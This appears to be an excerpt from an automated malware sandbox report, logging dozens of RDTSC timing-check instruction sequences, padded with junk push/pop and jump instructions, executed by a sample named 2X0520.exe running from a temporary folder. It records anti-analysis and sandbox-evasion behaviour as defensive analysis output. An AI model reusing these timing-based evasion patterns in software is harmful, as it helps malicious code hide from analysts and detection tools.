Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A89EF7 second address: A89F23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jc 00007F3838D0CF46h 0x00000014 js 00007F3838D0CF46h 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A89F23 second address: A89F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F3838E06D16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A89F2F second address: A89F35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8A07E second address: A8A084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8A084 second address: A8A088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8A088 second address: A8A093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8A1E5 second address: A8A1F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3838D0CF46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8A1F1 second address: A8A1F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8A1F5 second address: A8A1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8A3C8 second address: A8A3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3838E06D16h 0x0000000a popad 0x0000000b je 00007F3838E06D1Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8F9CD second address: A8F9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8F9D3 second address: A8F9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8FB9F second address: A8FBA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8FCF9 second address: A8FCFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8FCFD second address: A8FD09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3838D0CF46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3C0FC second address: A3C100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A3C100 second address: A3C10D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8FE38 second address: A8FE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3838E06D1Dh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3838E06D26h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A8FE62 second address: A8FE7F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F3838D0CF46h 0x0000000e jmp 00007F3838D0CF4Fh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A93DE7 second address: A93DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A93DEB second address: A93DF7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3838D0CF46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A93F76 second address: A93F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A93F7B second address: A93F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A93F83 second address: A93F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A93F8C second address: A93FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3838D0CF53h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A943D5 second address: A943E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jbe 00007F3838E06D2Ah 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A97E3C second address: A97E58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3838D0CF53h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A97E58 second address: A97E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3838E06D16h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F3838E06D26h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F3838E06D1Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A97FDE second address: A97FE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A97FE4 second address: A98008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3838E06D23h 0x0000000c jno 00007F3838E06D16h 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A98008 second address: A9800D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A9D7BE second address: A9D7D9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3838E06D16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 popad 0x00000011 push ebx 0x00000012 pushad 0x00000013 jnl 00007F3838E06D16h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A9DA71 second address: A9DA77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A9DA77 second address: A9DA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A9F170 second address: A9F176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A9F176 second address: A9F17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A9F440 second address: A9F444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A9F444 second address: A9F44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A9F44C second address: A9F46D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF57h 0x00000007 js 00007F3838D0CF52h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A9F46D second address: A9F473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AA4D03 second address: AA4D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jp 00007F3838D0CF46h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AA89D0 second address: AA89DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AA89DA second address: AA89F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF56h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AA89F9 second address: AA89FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AA89FF second address: AA8A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0005A second address: A00062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A00062 second address: A0007D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF57h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0007D second address: A0009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3838E06D25h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: A0009C second address: A000A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AA7DAC second address: AA7DCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jp 00007F3838E06D33h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3838E06D1Fh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AA8302 second address: AA8306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AA8306 second address: AA830A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB1D0F second address: AB1D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AAFF75 second address: AAFF90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D27h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB04C6 second address: AB04CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB061F second address: AB0623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB0623 second address: AB0631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F3838D0CF52h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB0631 second address: AB0637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB0637 second address: AB063B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB063B second address: AB0647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3838E06D16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB0647 second address: AB064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB07A0 second address: AB07A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB07A6 second address: AB07AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB07AA second address: AB07D3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3838E06D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3838E06D22h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jl 00007F3838E06D16h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB07D3 second address: AB07D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB07D7 second address: AB07DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB07DD second address: AB07ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F3838D0CF46h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB07ED second address: AB07F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB093C second address: AB0942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB0942 second address: AB0948 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB0B08 second address: AB0B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB0C91 second address: AB0C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3838E06D16h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB14FA second address: AB1504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB1504 second address: AB150A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AAFAA2 second address: AAFAC7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3838D0CF59h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AAFAC7 second address: AAFACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AAFACB second address: AAFAD7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3838D0CF46h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AAFAD7 second address: AAFAF2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3838E06D2Dh 0x00000008 jmp 00007F3838E06D21h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AAFAF2 second address: AAFAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB4E62 second address: AB4E68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB4E68 second address: AB4E6D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB8BA9 second address: AB8BAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB8BAE second address: AB8BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3838D0CF46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB877B second address: AB8787 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3838E06D16h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB8787 second address: AB879B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF4Fh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB88D2 second address: AB88EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3838E06D26h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB88EF second address: AB8901 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007F3838D0CF46h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AB8901 second address: AB890B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3838E06D16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AC4C29 second address: AC4C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AC4C2F second address: AC4C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3838E06D27h 0x00000009 jmp 00007F3838E06D1Ah 0x0000000e popad 0x0000000f ja 00007F3838E06D22h 0x00000015 jg 00007F3838E06D16h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AC4C63 second address: AC4C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AC67D4 second address: AC67D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AC67D8 second address: AC67E4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3838D0CF46h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AC67E4 second address: AC67F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3838E06D1Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AC9B39 second address: AC9B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
